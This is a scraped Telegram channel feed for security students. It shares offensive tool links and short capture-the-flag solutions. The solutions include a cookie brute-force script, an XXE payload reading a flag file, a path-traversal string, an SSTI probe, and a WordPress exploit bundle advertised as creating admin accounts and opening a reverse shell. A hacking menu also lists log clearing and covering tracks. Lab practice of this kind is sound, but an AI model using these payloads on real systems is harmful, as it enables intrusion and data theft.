SecList for CyberStudents
241 subscribers
600 photos
25 videos
211 files
913 links
Think outside the box
Download Telegram
Gourlex

It is a simple tool that can be used to extract URLs and paths from web pages. It can be helpful during web application assessments to uncover additional targets.

🔗Link https://github.com/trap-bytes/gourlex
Forwarded from Cat Seclist
#HacKingPro - Hack Like A Pro
Menu / To Do
[p] - Planning and Scoping
Asking for Target IP:
Asking for Target Name:
Asking for Target Phone:
Asking for Target Nik Name:
Asking for Target Email:
00 - Anonymity
00 - Firewall Rules
01 - Clear Logs
02 - Clear History
03 - Change MAC Address
04 - Change IP Address
05 - Change Routing
01 - Information Gathering
01 - Systems Information
02 - Networks Information
03 - Social Information
04 - SubDomain Information
02 - Vulnerability Assessment
03 - Web Application HacKing
04 - Database Assessment
05 - Password HacKing
06 - Wireless HacKing
07 - Reverse Engineering
08 - Exploit Frameworks & DataBases
09 - Sniffing - Spoofing
10 - Gaining & Maintaining Access
11 - Digital Forensic
12 - Analysis & Reporting
13 - Social Engineering
14 - Privilege Enumeration & Escalation
15 - Malware Analysis Labs/Tools
16 - Covering Tracks
https://github.com/Anlominus/HacKingPro
Forwarded from Cat Seclist
#ScanPro - NMap Scanning Scripts

ScanPro Menu

[1] Target Selection

[2] Port Selection

[3] Scan Types

[4] Service and Operating System Detection

[5] Output formats

[6] NSE Scripting

[7] HTTP info gathering

[m] Main Menu

https://github.com/Anlominus/ScanPro
codeby.games room: Cookie Jar

Cookie Bruter:
import requests

s = requests.Session()

i=0

for i in range(129):
i+=1

r=s.get('TARGET_IP:PORT', cookies={'id': str(i)})
print(r.text)


#Preparation #For #CTF
codeby.games room: Broken box

Vulnerable Type: XXE Injection

Payload:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag.txt" > ]>
<svg width="200px" height="200px" xmlns="https://www.w3.org/2000/svg" xmlns:xlink="https://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>

#Preparation #For #CTF
🔥1
Forwarded from Cat Seclist
Hackyx - A cybersecurity search engine for IT security resources like #CTF writeups and #BugBounty reports.
» https://hackyx.io/
🔥1
Forwarded from Cat Seclist
Hi everyone checkout the new tool Dnsbruter which is an asynchronous Dns brutforcing and Fuzzing tool to brutforce and get subdomains which can handle high loads wordlist, threads etc with custome resolvers which will be a new replacing tool for puredns to not crash your network anymore, to install the Dnsbruter see here: https://github.com/RevoltSecurities/Dnsbruter
codeby.games room: Regular page

Vulnerable Type: LFI

Simple payload: /../../../../flag.txt

#Preparation #For #CTF
🔥1
codeby.games room: Congratulations application

Vulnerable Type: SSTI

Payload: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2---dump-all-config-variables —> {{config.items()}}

Discover SSTI with curl: curl -g 'https://example.com:PORT/{{7*7}}'

#Preparation #For #CTF
🔥1
Forwarded from Cat Seclist
WordPress_Auto_Admin_Account_and_Reverse_Shell_cve_2024_27956.zip
3 KB
cve-2024-27956
*
WordPress Auto Admin Account Creation and Reverse Shell.
*
Дырка в плагине wp-automatic для выполнения SQL-запросов.

#wordpress